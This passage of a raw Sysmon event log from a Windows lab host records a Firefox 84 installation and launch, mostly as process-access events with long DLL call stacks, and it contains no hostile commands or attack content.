Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla 
Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla 
Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla 
Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla 
Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a 10341000x800000000000000016738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a|C:\Program Files\Mozilla Firefox\xul.dll+1bf9921|C:\Program Files\Mozilla Firefox\xul.dll+2342d8 534500x800000000000000016737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe 534500x800000000000000016736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:57.302{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe 10341000x800000000000000016735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.114{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.114{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.083{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.083{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla 
Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.067{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:57.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:57.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program 
Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.042{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.6.1298242966\1586886060" -childID 1 -isForBrowser -prefsHandle 2396 -prefMapHandle 1884 -prefsLen 1027 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 
"\\.\pipe\gecko-crash-server-pipe.7052" 2408 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.005{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c78|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla 
Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000016720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.005{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla 